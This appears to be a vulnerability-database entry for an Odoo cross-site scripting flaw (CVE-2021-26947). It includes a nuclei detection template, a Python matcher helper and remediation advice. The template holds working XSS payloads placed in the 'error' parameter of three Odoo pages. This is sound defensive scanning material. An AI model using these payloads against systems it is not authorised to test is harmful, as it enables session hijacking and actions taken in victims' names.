
Odoo <= 15.0 - Cross-Site Scripting

CVE-2021-26947
Early Release

Description

A cross-site scripting (XSS) vulnerability in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote attackers to inject arbitrary web scripts into the browser of a victim via a crafted link. This issue could lead to the execution of malicious scripts in the context of the user's browser session.

Severity

Medium

CVSS Score

6.1

Exploit Probability

1%

Affected Product

odoo

Published Date

April 20, 2026

Template Author

ritikchaddha

CVE-2021-26947.yaml
id: CVE-2021-26947

info:
  name: Odoo <= 15.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    A cross-site scripting (XSS) vulnerability in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote attackers to inject arbitrary web scripts into the browser of a victim via a crafted link. This issue could lead to the execution of malicious scripts in the context of the user's browser session.
  impact: |
    Attackers can execute arbitrary scripts in victims' browsers, potentially stealing cookies, session tokens, or performing actions on behalf of the user.
  remediation: |
    Update to the latest version of Odoo where the vulnerability is fixed or apply security patches that sanitize user inputs properly.
  reference:
    - https://github.com/odoo/odoo/issues/107694
    - https://www.debian.org/security/2023/dsa-5399
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26947
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
    cve-id: CVE-2021-26947
    epss-score: 0.0089
    epss-percentile: 0.75554
  metadata:
    max-request: 3
    verified: true
    vendor: odoo
    product: odoo
  tags: cve,cve2021,odoo,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/web/login?error=<script>alert(document.domain)</script>"
      - "{{BaseURL}}/web/signup?error=<img/src=x+onerror=alert(document.domain)>"
      - "{{BaseURL}}/web/reset_password?error=<svg/onload=alert(document.domain)>"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<script>alert(document.domain)</script>", "<img/src=x onerror=alert(document.domain)>", "<svg/onload=alert(document.domain)>")'
          - 'contains_any(body, "content=\"Odoo", "var odoo", "Odoo</title>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100d3c45eaca8c7bea9eac43ae6199ab8402a2ee7b956b494bec4b8b5e16b76a92c022100cb59759cd9c26434a7231b0f2a2594e60240adc4ef520285a195e01c95db41ad:922c64590222798bb761d5b6d8e72950
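To make explicit what the template's matchers assert, and how the same check reads against a patched response, here is an added Python example (not part of the template, of nuclei, or of Odoo): it classifies whether the echoed `error` text came back with its markup intact or HTML-entity encoded, and re-implements the four DSL conditions joined by `and`. The response bodies are constructed for the example, not captured from a live instance.

```python
import html

# Reflected strings the template's first DSL line looks for (taken from the page).
PAYLOADS = (
    "<script>alert(document.domain)</script>",
    "<img/src=x onerror=alert(document.domain)>",
    "<svg/onload=alert(document.domain)>",
)

# Odoo page fingerprints from the template's second DSL line.
ODOO_MARKERS = ('content="Odoo', "var odoo", "Odoo</title>")


def reflection_state(body: str, payload: str) -> str:
    """How the error text came back: 'raw' (markup intact, the vulnerable case),
    'escaped' (HTML-entity encoded, the patched case) or 'absent'."""
    if payload in body:
        return "raw"
    if html.escape(payload, quote=False) in body:
        return "escaped"
    return "absent"


def template_matches(status_code: int, content_type: str, body: str) -> bool:
    """Re-implements the template's four DSL conditions joined with `and`."""
    reflected = any(reflection_state(body, p) == "raw" for p in PAYLOADS)
    looks_like_odoo = any(marker in body for marker in ODOO_MARKERS)
    return (reflected and looks_like_odoo
            and "text/html" in content_type and status_code == 200)


def _login_page(error_text: str) -> str:
    # Constructed skeleton of a login page, not captured from a real Odoo instance.
    return ("<html><head><title>Login | Odoo</title></head><body>"
            f'<p class="alert">{error_text}</p></body></html>')


VULNERABLE_BODY = _login_page(PAYLOADS[0])                        # echoed verbatim
PATCHED_BODY = _login_page(html.escape(PAYLOADS[0], quote=False))  # entity-encoded


def assess(body: str, status_code: int = 200,
           content_type: str = "text/html; charset=utf-8"):
    """Return (template_would_match, {payload: reflection_state})."""
    states = {p: reflection_state(body, p) for p in PAYLOADS}
    return template_matches(status_code, content_type, body), states
```

A non-match on a patched instance is only evidence for the three paths the template probes; the same escaped-versus-raw check belongs on any other page that echoes a query parameter.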
Score: 6.1

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID: CVE-2021-26947
CWE ID: CWE-79

References

https://github.com/odoo/odoo/issues/107694
https://www.debian.org/security/2023/dsa-5399
https://nvd.nist.gov/vuln/detail/CVE-2021-26947

Remediation Steps

Update to the latest version of Odoo where the vulnerability is fixed or apply security patches that sanitize user inputs properly.